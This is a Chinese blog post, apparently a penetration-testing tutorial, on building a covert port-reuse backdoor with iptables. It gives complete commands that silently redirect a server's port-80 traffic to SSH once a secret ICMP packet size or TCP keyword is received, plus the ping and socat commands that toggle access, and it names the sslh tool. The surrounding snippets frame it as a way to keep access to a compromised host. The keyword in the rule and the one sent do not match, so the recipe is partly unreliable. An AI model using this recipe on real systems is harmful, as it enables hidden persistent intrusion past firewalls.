远程遥控iptables实现端口复用

最新推荐文章于 2024-10-11 15:53:58 发布
最新推荐文章于 2024-10-11 15:53:58 发布
阅读量128 收藏
点赞数
分类专栏: 网络安全 文章标签: 网络 java 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66218784/article/details/128928059
版权

使用icmp远程遥控开关,缺点在于如果目标在内网则无法ping通

 [root@localhost ~]# iptables -t nat -N LETMEIN   创建端口复用链
[root@localhost ~]# iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22创建复用规则,将流量转向22端口
[root@localhost ~]# iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1139 -m recent --set --name letmein --rsource -j ACCEPT开启开关,如果接收到一个数据包大小为1139则将ip写入规则letmein
[root@localhost ~]# iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1140 -m recent --name letmein --remove -j ACCEPT关闭开关,如果接收到一个数据包大小为1140则将ip从letmein中去掉
[root@localhost ~]# iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN如果发现syn包的来源ip发送到letmein列表中则将跳转到letmein,时间为3600s

[root@localhost ~]# ping -c 1 -s 1111 192.168.140.135开启复用,1111为数据,剩下28为包头
PING 192.168.140.135 (192.168.140.135) 1111(1139) bytes of data.
1119 bytes from 192.168.140.135: icmp_seq=1 ttl=64 time=1.98 ms

--- 192.168.140.135 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.975/1.975/1.975/0.000 ms
[root@localhost ~]# ping -c 1 -s 1112 192.168.140.135关闭复用,1112为数据,剩下28为包头
PING 192.168.140.135 (192.168.140.135) 1112(1140) bytes of data.
1120 bytes from 192.168.140.135: icmp_seq=1 ttl=64 time=0.502 ms

--- 192.168.140.135 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.502/0.502/0.502/0.000 ms

利用 tcp 数据包中的关键字做遥控开关,不怕目标在内网

前些部分与icmp基本相同 

[root@localhost ~]# iptables -t nat -N LETMEIN创建端口复用链
[root@localhost ~]# iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22创建复用规则将流量转向端口22
[root@localhost ~]# iptables -A INPUT -p tcp -m string --string 'zhimakaimen' --algo bm -m recent --set --name letmein --rsource -j ACCEPT开启开关
[root@localhost ~]# iptables -A INPUT -p tcp -m string --string ‘threathunterleaving’ --algo bm -m recent --name letmein --remove -j ACCEPT关闭开关
[root@localhost ~]# iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN跳转,时间为3600s

echo threathuntercoming | socat - tcp:192.168.10.129:80#打开
echo threathunterleaving | socat - tcp:192.168.10.129:80#关闭
 

sslh工具


[root@localhost ~]# sudo yum install epel-release下载 

[root@localhost ~]# sudo yum install sslh下载

  更改配置文件sslh.cfg

 进行连接 

snxy
关注
专栏目录
Linux利用iptables端口复用
谢公子的博客
05-02 2329
在做渗透测试的过程中,我们经常会遇到下面这种问题。 目标主机是Linux系统,目标主机防火墙有严格的限制,只允许80端口的流量进入。我们拿到了目标主机的Webshell并且拿到了SSH的账号密码。但是该主机的22端口不对外开放。现在我们想远程SSH连接到目标主机。 ...
iptables端口复用后门+sslh
m0_56501091的博客
02-03 280
端口复用是不同的应用程序使用相同的端口进行通讯,在内网渗透中,服务器仅允许指定的端口开放,利用端口复用可以把例如3389端口转发到80端口上进行外部连接。目的:服务器一般部署在内网,仅有web服务用于被访问,我们将其他的服务通过端口复用绑定在80端口上,相当于给自己留下了一个后门。4、创建关闭开关,如果接收到一个长为 1140 的 ICMP 包,则将来源 IP 从 letmein 列表中去掉。3、创建开启开关,如果接收到长1139的ICMP包,则将来源ip添加到letmein的列表中。
远程遥控iptables进行端口复用以及SSLH工具使用
m0_68390300的博客
02-02 309
iptables端口复用以及sslh工具使用
iptables实现端口复用
好好睡觉
02-02 1689
iptables端口复用、centos下的sslh使用
iptables端口复用
HH_beibei的博客
02-03 791
端口复用是指不同的应用程序使用相同端口使用相同端口进行通讯。
icmp端口_Linux利用iptables端口复用
weixin_39771351的博客
12-01 357
目录iptables端口复用方案一:(根据源地址做端口复用)方案二:(根据源地址源端口端口复用)方案三:(利用ICMP协议做遥控开关)方案四:(利用TCP协议做遥控开关)iptables端口复用在做渗透测试的过程中,我们经常会遇到下面这种问题。目标主机是Linux系统,目标主机防火墙有严格的限制,只允许80端口的流量进入。我们拿到了目标主机的Webshell并且拿到了SSH的账号密...
iptables端口复用_远程操控
m0_63069714的博客
02-02 334
目的:如果发现SYN包的来源IP处于jack列表中,将直接转到HTTP_SSH_PORT链上进行处理,有效时间为3600秒。缺点:如果目标在内网,有可能无法直接 ping 到它,原因可能存在对方使用防火墙将ping直接关闭。目的:如果接受到一个长为1139的ICMP包,则将来源IP添加到为jack的列表中。目的:如果收到一个长为1140的ICMP包,则将来源IP从jack列表中去掉。此时使用80端口进行远程连接,实现了80端口在22端口复用,且成功连接。此时使用80端口,进行远程连接将无法连接成功。
通过iptables实现端口转发和内网共享上网.docx
09-30
通过iptables实现端口转发和内网共享上网 本文将详细介绍如何使用iptables实现端口转发和内网共享上网。iptables是一个Linux下的优秀的nat+防火墙工具,可以配置灵活强劲的防火墙+nat系统。 首先,需要说明的是,...
shell脚本结合iptables端口扫描的实现
01-20
使用iptables的recent模块记录下在60秒钟内扫描超过10个端口的IP,并结合inotify-tools工具实时监控iptables的日志,一旦iptables日志文件有写入新的ip记录,则使用iptables封锁源ip,起到了防止端口扫描的功能。...
【安全】端口复用远程遥控iptables&SSLH工具
故余虽愚,卒获有所闻
02-03 942
iptables开启后,,分别为Prerouting(路由前)、Input(输入)、Outpu(输出)、Forward(转发)、Postrouting(路由后):每一道关卡中有多个规则,数据报文,这些规则串起来就像一条链,所以我们把这些关卡都叫【一般写规则的序号都是跳着用,5‘10’15这些,因为匹配按顺序所以对规则进行了留白】当接收到防火墙本机地址的数据包(入站)时,应用此链中的规则;当防火墙本机向外发送数据包(出站)时,应用此链中的规则;
开启 iptables设置端口访问权限
chechenshi的博客
08-27 2647
iptables 访问规则设置
linux 7.4允许远程设置,CentOS 7.4利用Iptables开启远程访问
weixin_35519039的博客
05-11 204
CentOS 7默认使用的是firewall作为防火墙,首先安装iptables防火墙。1、关闭firewall:systemctl stop firewalld.servicesystemctl disable firewalld.servicesystemctl mask firewalld.service2、安装iptables防火墙yum install iptables-services...
iptables-远程访问数据库端口策略
bisal的专栏
09-18 1311
一个开发提出的业务需求,需要开通某台服务器,到某套数据库的访问权限,即1521端口访问权限,提交了网络工单,等网络实施后,进行测试, > telnet x.x.x.x 1521 正在连接10.6.1.1...   竟然连接不通?咨询网络,确认已经开通了。还有什么问题?   朋友们可能已经猜出来,有可能是防火墙,屏蔽了对于1521端口的访问。如何验证?因为是测试环境,所以最简单...
远程遥控 IPTables 进行端口复用
weixin_43639741的博客
04-17 1056
这篇首发在 ThreatHunter 社区:国内首个专注于高级威胁发现与安全数据分析的社区,请大家多多支持,https://threathunter.org。 有一天坐地铁的时候突然想到利用 iptables nat 表的 PREROUTING 链配合 REDIRECT 应该是可以达到端口复用的效果的。 比如在服务器的 PREROUTING 链里面加一条规则,将到本机 80 端口的流量 REDIR...
【2024版】最新kali linux入门及常用简单工具介绍(非常详细)零基础入门到精通,收藏这一篇就够了_kalilinux
weixin_57514792的博客
10-07 1254
最新kali linux入门及常用简单工具介绍
WireShark过滤器
最新发布
ngczx的博客
10-11 531
Wireshark的过滤器规则可以分为**捕获过滤器**和**显示过滤器**,这两种过滤器有不同的编写规则
网络扫描模块python-nmap案例解析
we chat:玩转测试开发
10-07 480
它可以方便地在 Python 脚本中执行网络扫描,并解析 Nmap 的输出结果。python-nmap 模块是进行网络扫描的强大工具,通过简单的接口和丰富的功能,开发者可以轻松地在 Python 中集成网络安全检查和资产发现功能。6.1执行扫描:在 run_nmap_scan 函数中,创建了一个 nmap.PortScanner 实例,并使用 scan() 方法执行网络扫描。6.2 解析结果:扫描结果通过访问 scanner.all_hosts() 方法获取,并打印每个主机的状态和开放端口信息。
《C++中实现高效网络流处理的关键技术与实践》
xy520521的博客
10-08 715
在一个简单的服务器程序中,如果使用阻塞式 I/O,当有大量客户端同时连接时,服务器需要为每个客户端创建一个线程,而这些线程大部分时间都处于阻塞状态,浪费了大量的系统资源。例如,Google 的 Protocol Buffers 和 Facebook 的 FlatBuffers 都是非常高效的序列化库,它们可以将数据序列化为紧凑的二进制格式,减少数据的传输量和序列化/反序列化的时间。在进行网络流处理时,可以对协议头进行优化,减少不必要的信息传输,提高数据传输的效率。选择合适的网络编程模型。
Note24100901_Portal_V18_Advanced5_Modscan的Modbus仿真
qq_51407861的博客
10-09 248
在这里插入图片描述](https://i-blog.csdnimg.cn/direct/8d85098268484044b2816d8a78c031f4.png#pic_center。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值